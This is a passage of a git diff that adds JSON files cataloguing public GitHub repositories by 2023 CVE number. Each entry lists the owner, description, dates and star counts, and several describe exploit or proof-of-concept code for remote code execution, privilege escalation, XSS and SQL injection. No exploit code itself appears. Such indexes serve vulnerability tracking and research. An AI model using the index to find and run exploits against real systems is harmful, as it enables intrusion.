"C1ph3rX13", + "id": 80873500, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80873500?v=4", + "html_url": "https:\/\/github.com\/C1ph3rX13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/C1ph3rX13\/CVE-2023-42820", + "description": "CVE-2023-42820", + "fork": false, + "created_at": "2023-10-10T06:32:51Z", + "updated_at": "2024-08-15T06:02:46Z", + "pushed_at": "2024-04-03T09:57:07Z", + "stargazers_count": 55, + "watchers_count": 55, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 55, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 703323724, + "name": "cve-2023-42820", + "full_name": "Startr4ck\/cve-2023-42820", + "owner": { + "login": "Startr4ck", + "id": 53632236, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53632236?v=4", + "html_url": "https:\/\/github.com\/Startr4ck", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Startr4ck\/cve-2023-42820", + "description": "JumpServer ", + "fork": false, + "created_at": "2023-10-11T03:15:30Z", + "updated_at": "2024-01-18T12:33:14Z", + "pushed_at": "2023-10-12T08:16:13Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42860.json b/2023/CVE-2023-42860.json new file mode 100644 index 0000000000..5636de0adb --- /dev/null +++ b/2023/CVE-2023-42860.json @@ -0,0 +1,41 @@ +[ + { + "id": 784286642, + "name": "CVE-2023-42860", + "full_name": "Trigii\/CVE-2023-42860", + "owner": { + "login": "Trigii", + "id": 95245480, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95245480?v=4", + "html_url": "https:\/\/github.com\/Trigii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trigii\/CVE-2023-42860", + "description": "Exploit for CVE-2023-42860", + "fork": false, + "created_at": "2024-04-09T14:53:46Z", + "updated_at": "2024-10-22T16:54:08Z", + "pushed_at": "2024-09-12T16:55:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apple", + "exploit", + "fda", + "macos", + "root", + "sip", + "tcc" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42931.json b/2023/CVE-2023-42931.json new file mode 100644 index 0000000000..3228662a26 --- /dev/null +++ b/2023/CVE-2023-42931.json @@ -0,0 +1,33 @@ +[ + { + "id": 777701876, + "name": "CVE-2023-42931", + "full_name": "d0rb\/CVE-2023-42931", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2023-42931", + "description": "The exploit targets a critical privilege escalation vulnerability in macOS versions Monterey, Ventura, and Sonoma.", + "fork": false, + "created_at": "2024-03-26T11:01:54Z", + "updated_at": "2024-10-22T16:52:49Z", + "pushed_at": "2024-03-26T17:16:23Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4294.json b/2023/CVE-2023-4294.json new file mode 100644 index 0000000000..3a65a4d517 --- /dev/null +++ b/2023/CVE-2023-4294.json @@ -0,0 +1,33 @@ +[ + { + "id": 695816825, + "name": "CVE-2023-4294", + "full_name": "b0marek\/CVE-2023-4294", + "owner": { + "login": "b0marek", + "id": 144051679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4", + "html_url": "https:\/\/github.com\/b0marek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-4294", + "description": "Repository for CVE-2023-4294 vulnerability. ", + "fork": false, + "created_at": "2023-09-24T10:16:03Z", + "updated_at": "2023-09-24T10:16:04Z", + "pushed_at": "2023-09-24T10:20:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4300.json b/2023/CVE-2023-4300.json new file mode 100644 index 0000000000..d465a1a0cf --- /dev/null +++ b/2023/CVE-2023-4300.json @@ -0,0 +1,33 @@ +[ + { + "id": 883513162, + "name": "CVE-2023-4300", + "full_name": "bde574786\/CVE-2023-4300", + "owner": { + "login": "bde574786", + "id": 102010541, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102010541?v=4", + "html_url": "https:\/\/github.com\/bde574786", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bde574786\/CVE-2023-4300", + "description": null, + "fork": false, + "created_at": "2024-11-05T05:06:26Z", + "updated_at": "2024-11-05T05:09:09Z", + "pushed_at": "2024-11-05T05:09:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43040.json b/2023/CVE-2023-43040.json new file mode 100644 index 0000000000..acbbdd8682 --- /dev/null +++ b/2023/CVE-2023-43040.json @@ -0,0 +1,33 @@ +[ + { + "id": 835371220, + "name": "CVE-2023-43040", + "full_name": "riza\/CVE-2023-43040", + "owner": { + "login": "riza", + "id": 2565849, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2565849?v=4", + "html_url": "https:\/\/github.com\/riza", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/riza\/CVE-2023-43040", + "description": "CVE-2023-43040 PoC", + "fork": false, + "created_at": "2024-07-29T17:39:14Z", + "updated_at": "2024-07-30T05:53:26Z", + "pushed_at": "2024-07-29T17:53:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43115.json b/2023/CVE-2023-43115.json new file mode 100644 index 0000000000..9c26d77cdb --- /dev/null +++ b/2023/CVE-2023-43115.json @@ -0,0 +1,33 @@ +[ + { + "id": 697892944, + "name": "ghostscript-CVE-2023-43115", + "full_name": "jostaub\/ghostscript-CVE-2023-43115", + "owner": { + "login": "jostaub", + "id": 67969701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67969701?v=4", + "html_url": "https:\/\/github.com\/jostaub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jostaub\/ghostscript-CVE-2023-43115", + "description": "A small write-up with examples to understand CVE-2023-43115", + "fork": false, + "created_at": "2023-09-28T17:30:06Z", + "updated_at": "2024-04-09T19:00:53Z", + "pushed_at": "2023-12-26T15:37:47Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43144.json b/2023/CVE-2023-43144.json new file mode 100644 index 0000000000..eab93a1aed --- /dev/null +++ b/2023/CVE-2023-43144.json @@ -0,0 +1,33 @@ +[ + { + "id": 704649398, + "name": "CVE-2023-43144", + "full_name": "Pegasus0xx\/CVE-2023-43144", + "owner": { + "login": "Pegasus0xx", + "id": 122263374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122263374?v=4", + "html_url": "https:\/\/github.com\/Pegasus0xx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pegasus0xx\/CVE-2023-43144", + "description": "Assets Management System 1.0 is vulnerable to SQL injection via the id parameter in delete.php", + "fork": false, + "created_at": "2023-10-13T18:19:22Z", + "updated_at": "2023-10-13T18:19:22Z", + "pushed_at": "2023-10-13T18:20:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43147.json b/2023/CVE-2023-43147.json new file mode 100644 index 0000000000..f0dc80e83c --- /dev/null +++ b/2023/CVE-2023-43147.json @@ -0,0 +1,33 @@ +[ + { + "id": 703710841, + "name": "CVE-2023-43147", + "full_name": "MinoTauro2020\/CVE-2023-43147", + "owner": { + "login": "MinoTauro2020", + "id": 65294596, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65294596?v=4", + "html_url": "https:\/\/github.com\/MinoTauro2020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MinoTauro2020\/CVE-2023-43147", + "description": "CVE-2023-43148", + "fork": false, + "created_at": "2023-10-11T18:55:40Z", + "updated_at": "2024-07-22T05:50:46Z", + "pushed_at": "2023-10-12T16:22:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43148.json b/2023/CVE-2023-43148.json new file mode 100644 index 0000000000..b81603e798 --- /dev/null +++ b/2023/CVE-2023-43148.json @@ -0,0 +1,33 @@ +[ + { + "id": 692410769, + "name": "CVE-2023-43148", + "full_name": "MinoTauro2020\/CVE-2023-43148", + "owner": { + "login": "MinoTauro2020", + "id": 65294596, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65294596?v=4", + "html_url": "https:\/\/github.com\/MinoTauro2020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MinoTauro2020\/CVE-2023-43148", + "description": "CVE CSRF DELETE ACCOUNT", + "fork": false, + "created_at": "2023-09-16T11:48:44Z", + "updated_at": "2024-07-22T05:50:48Z", + "pushed_at": "2023-10-12T16:09:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43149.json b/2023/CVE-2023-43149.json new file mode 100644 index 0000000000..9609adff8b --- /dev/null +++ b/2023/CVE-2023-43149.json @@ -0,0 +1,33 @@ +[ + { + "id": 704142072, + "name": "CVE-2023-43149", + "full_name": "MinoTauro2020\/CVE-2023-43149", + "owner": { + "login": "MinoTauro2020", + "id": 65294596, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65294596?v=4", + "html_url": "https:\/\/github.com\/MinoTauro2020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MinoTauro2020\/CVE-2023-43149", + "description": "CVE-2023-43149", + "fork": false, + "created_at": "2023-10-12T16:11:39Z", + "updated_at": "2024-07-22T07:13:14Z", + "pushed_at": "2023-10-12T16:23:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43154.json b/2023/CVE-2023-43154.json new file mode 100644 index 0000000000..8e49f30f80 --- /dev/null +++ b/2023/CVE-2023-43154.json @@ -0,0 +1,33 @@ +[ + { + "id": 689157148, + "name": "CVE-2023-43154-PoC", + "full_name": "ally-petitt\/CVE-2023-43154-PoC", + "owner": { + "login": "ally-petitt", + "id": 76501220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76501220?v=4", + "html_url": "https:\/\/github.com\/ally-petitt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ally-petitt\/CVE-2023-43154-PoC", + "description": "PoC for the type confusion vulnerability in Mac's CMS that results in authentication bypass and administrator account takeover.", + "fork": false, + "created_at": "2023-09-09T00:21:58Z", + "updated_at": "2023-09-22T23:23:27Z", + "pushed_at": "2023-09-22T23:25:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43177.json b/2023/CVE-2023-43177.json new file mode 100644 index 0000000000..43f35c4b8f --- /dev/null +++ b/2023/CVE-2023-43177.json @@ -0,0 +1,33 @@ +[ + { + "id": 736082515, + "name": "CVE-2023-43177", + "full_name": "the-emmons\/CVE-2023-43177", + "owner": { + "login": "the-emmons", + "id": 70683790, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70683790?v=4", + "html_url": "https:\/\/github.com\/the-emmons", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/the-emmons\/CVE-2023-43177", + "description": "CrushFTP <= 10.5.1 Remote Code Execution. Researchers: Ryan Emmons, Evan Malamis", + "fork": false, + "created_at": "2023-12-27T00:06:20Z", + "updated_at": "2024-11-07T04:27:46Z", + "pushed_at": "2024-06-14T17:44:09Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43208.json b/2023/CVE-2023-43208.json new file mode 100644 index 0000000000..ec1fdf5555 --- /dev/null +++ b/2023/CVE-2023-43208.json @@ -0,0 +1,140 @@ +[ + { + "id": 772545059, + "name": "CVE-2023-43208-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2023-43208-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2023-43208-EXPLOIT", + "description": "A PoC exploit for CVE-2023-43208 - Mirth Connect Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-03-15T12:03:51Z", + "updated_at": "2024-09-19T12:05:19Z", + "pushed_at": "2024-03-16T21:22:27Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-43208", + "exploit", + "exploitation", + "exploits", + "hacking", + "mirth-connect", + "poc", + "proof-of-concept", + "rce", + "remote-code-execution", + "remote-code-execution-rce", + "vulnerabilities", + "vulnerability" + ], + "visibility": "public", + "forks": 11, + "watchers": 26, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 773284524, + "name": "CVE-2023-43208-mirth-connect-rce-poc", + "full_name": "jakabakos\/CVE-2023-43208-mirth-connect-rce-poc", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2023-43208-mirth-connect-rce-poc", + "description": null, + "fork": false, + "created_at": "2024-03-17T08:44:14Z", + "updated_at": "2024-06-06T11:58:40Z", + "pushed_at": "2024-03-18T14:09:35Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812794551, + "name": "CVE-2023-43208-MIRTHCONNECT", + "full_name": "J4F9S5D2Q7\/CVE-2023-43208-MIRTHCONNECT", + "owner": { + "login": "J4F9S5D2Q7", + "id": 171471588, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171471588?v=4", + "html_url": "https:\/\/github.com\/J4F9S5D2Q7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/J4F9S5D2Q7\/CVE-2023-43208-MIRTHCONNECT", + "description": null, + "fork": false, + "created_at": "2024-06-09T22:25:22Z", + "updated_at": "2024-06-09T22:34:38Z", + "pushed_at": "2024-06-09T22:33:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 895464509, + "name": "CVE-2023-43208_Detection_PoC", + "full_name": "Avento\/CVE-2023-43208_Detection_PoC", + "owner": { + "login": "Avento", + "id": 13798539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13798539?v=4", + "html_url": "https:\/\/github.com\/Avento", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Avento\/CVE-2023-43208_Detection_PoC", + "description": "Use java.net.InetAddress for detection", + "fork": false, + "created_at": "2024-11-28T09:03:23Z", + "updated_at": "2024-11-28T15:21:14Z", + "pushed_at": "2024-11-28T09:05:00Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43261.json b/2023/CVE-2023-43261.json new file mode 100644 index 0000000000..50b49de5da --- /dev/null +++ b/2023/CVE-2023-43261.json @@ -0,0 +1,35 @@ +[ + { + "id": 697676686, + "name": "CVE-2023-43261", + "full_name": "win3zz\/CVE-2023-43261", + "owner": { + "login": "win3zz", + "id": 12781459, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12781459?v=4", + "html_url": "https:\/\/github.com\/win3zz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/win3zz\/CVE-2023-43261", + "description": "CVE-2023-43261 - Credential Leakage Through Unprotected System Logs and Weak Password Encryption", + "fork": false, + "created_at": "2023-09-28T08:45:55Z", + "updated_at": "2024-11-06T11:42:29Z", + "pushed_at": "2023-10-01T08:36:06Z", + "stargazers_count": 56, + "watchers_count": 56, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-43261" + ], + "visibility": "public", + "forks": 8, + "watchers": 56, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43263.json b/2023/CVE-2023-43263.json new file mode 100644 index 0000000000..7876c4510c --- /dev/null +++ b/2023/CVE-2023-43263.json @@ -0,0 +1,33 @@ +[ + { + "id": 696679641, + "name": "CVE-2023-43263", + "full_name": "b0marek\/CVE-2023-43263", + "owner": { + "login": "b0marek", + "id": 144051679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4", + "html_url": "https:\/\/github.com\/b0marek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-43263", + "description": "Repository for CVE-2023-43263 vulnerability. ", + "fork": false, + "created_at": "2023-09-26T08:24:16Z", + "updated_at": "2023-09-28T13:56:26Z", + "pushed_at": "2023-10-10T07:17:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43284.json b/2023/CVE-2023-43284.json new file mode 100644 index 0000000000..d84aabbbaf --- /dev/null +++ b/2023/CVE-2023-43284.json @@ -0,0 +1,33 @@ +[ + { + "id": 700363228, + "name": "CVE-2023-43284", + "full_name": "MateusTesser\/CVE-2023-43284", + "owner": { + "login": "MateusTesser", + "id": 45717435, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45717435?v=4", + "html_url": "https:\/\/github.com\/MateusTesser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MateusTesser\/CVE-2023-43284", + "description": "DLink DIR-846 Authenticated Remote Code Execution", + "fork": false, + "created_at": "2023-10-04T13:07:37Z", + "updated_at": "2024-05-16T03:37:47Z", + "pushed_at": "2023-10-04T13:31:59Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43317.json b/2023/CVE-2023-43317.json new file mode 100644 index 0000000000..b509d060f9 --- /dev/null +++ b/2023/CVE-2023-43317.json @@ -0,0 +1,33 @@ +[ + { + "id": 747061917, + "name": "CVE-2023-43317", + "full_name": "amjadali-110\/CVE-2023-43317", + "owner": { + "login": "amjadali-110", + "id": 140477743, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140477743?v=4", + "html_url": "https:\/\/github.com\/amjadali-110", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amjadali-110\/CVE-2023-43317", + "description": "Vertical Privilege Escalation via Session Storage by Amjad Ali (CVE-2023-43317)", + "fork": false, + "created_at": "2024-01-23T07:27:30Z", + "updated_at": "2024-08-23T05:41:32Z", + "pushed_at": "2024-08-23T05:41:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43318.json b/2023/CVE-2023-43318.json new file mode 100644 index 0000000000..6dbb459402 --- /dev/null +++ b/2023/CVE-2023-43318.json @@ -0,0 +1,33 @@ +[ + { + "id": 765669255, + "name": "CVE-2023-43318", + "full_name": "str2ver\/CVE-2023-43318", + "owner": { + "login": "str2ver", + "id": 161814438, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161814438?v=4", + "html_url": "https:\/\/github.com\/str2ver", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/str2ver\/CVE-2023-43318", + "description": "JetStream Smart Switch - TL-SG2210P v5.0\/ Improper Access Control \/ CVE-2023-43318", + "fork": false, + "created_at": "2024-03-01T11:35:47Z", + "updated_at": "2024-03-01T11:35:47Z", + "pushed_at": "2024-03-01T11:53:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43323.json b/2023/CVE-2023-43323.json new file mode 100644 index 0000000000..0f78164848 --- /dev/null +++ b/2023/CVE-2023-43323.json @@ -0,0 +1,33 @@ +[ + { + "id": 692272876, + "name": "CVE-2023-43323", + "full_name": "ahrixia\/CVE-2023-43323", + "owner": { + "login": "ahrixia", + "id": 35935843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35935843?v=4", + "html_url": "https:\/\/github.com\/ahrixia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahrixia\/CVE-2023-43323", + "description": "mooSocial v3.1.8 is vulnerable to external service interaction on post function.", + "fork": false, + "created_at": "2023-09-16T01:28:58Z", + "updated_at": "2024-08-12T20:32:45Z", + "pushed_at": "2023-09-26T15:32:53Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43325.json b/2023/CVE-2023-43325.json new file mode 100644 index 0000000000..824d9adbe6 --- /dev/null +++ b/2023/CVE-2023-43325.json @@ -0,0 +1,35 @@ +[ + { + "id": 692268843, + "name": "CVE-2023-43325", + "full_name": "ahrixia\/CVE-2023-43325", + "owner": { + "login": "ahrixia", + "id": 35935843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35935843?v=4", + "html_url": "https:\/\/github.com\/ahrixia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahrixia\/CVE-2023-43325", + "description": "mooSocial v3.1.8 is vulnerable to cross-site scripting on user login function.", + "fork": false, + "created_at": "2023-09-16T01:05:16Z", + "updated_at": "2024-08-12T20:32:45Z", + "pushed_at": "2023-09-29T14:53:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "xss" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43326.json b/2023/CVE-2023-43326.json new file mode 100644 index 0000000000..005abc938a --- /dev/null +++ b/2023/CVE-2023-43326.json @@ -0,0 +1,33 @@ +[ + { + "id": 693444960, + "name": "CVE-2023-43326", + "full_name": "ahrixia\/CVE-2023-43326", + "owner": { + "login": "ahrixia", + "id": 35935843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35935843?v=4", + "html_url": "https:\/\/github.com\/ahrixia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahrixia\/CVE-2023-43326", + "description": "mooSocial v3.1.8 is vulnerable to cross-site scripting on Multiple URLs.", + "fork": false, + "created_at": "2023-09-19T03:38:25Z", + "updated_at": "2024-08-12T20:32:47Z", + "pushed_at": "2023-09-26T16:14:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43339.json b/2023/CVE-2023-43339.json new file mode 100644 index 0000000000..ab27e81671 --- /dev/null +++ b/2023/CVE-2023-43339.json @@ -0,0 +1,33 @@ +[ + { + "id": 692439285, + "name": "CVE-2023-43339-CMSmadesimple-Reflected-XSS---Installation", + "full_name": "sromanhu\/CVE-2023-43339-CMSmadesimple-Reflected-XSS---Installation", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43339-CMSmadesimple-Reflected-XSS---Installation", + "description": "CMSmadesimple 2.2.18 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload in the installation process.", + "fork": false, + "created_at": "2023-09-16T13:35:49Z", + "updated_at": "2023-09-25T21:41:42Z", + "pushed_at": "2023-09-18T06:55:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43340.json b/2023/CVE-2023-43340.json new file mode 100644 index 0000000000..fbbe65ad86 --- /dev/null +++ b/2023/CVE-2023-43340.json @@ -0,0 +1,33 @@ +[ + { + "id": 693008952, + "name": "-CVE-2023-43340-Evolution-Reflected-XSS---Installation-Admin-Options", + "full_name": "sromanhu\/-CVE-2023-43340-Evolution-Reflected-XSS---Installation-Admin-Options", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/-CVE-2023-43340-Evolution-Reflected-XSS---Installation-Admin-Options", + "description": "Evolution CMS 3.2.3 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload in the installation\/options process.", + "fork": false, + "created_at": "2023-09-18T06:58:39Z", + "updated_at": "2023-09-28T22:32:26Z", + "pushed_at": "2023-09-21T12:10:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": 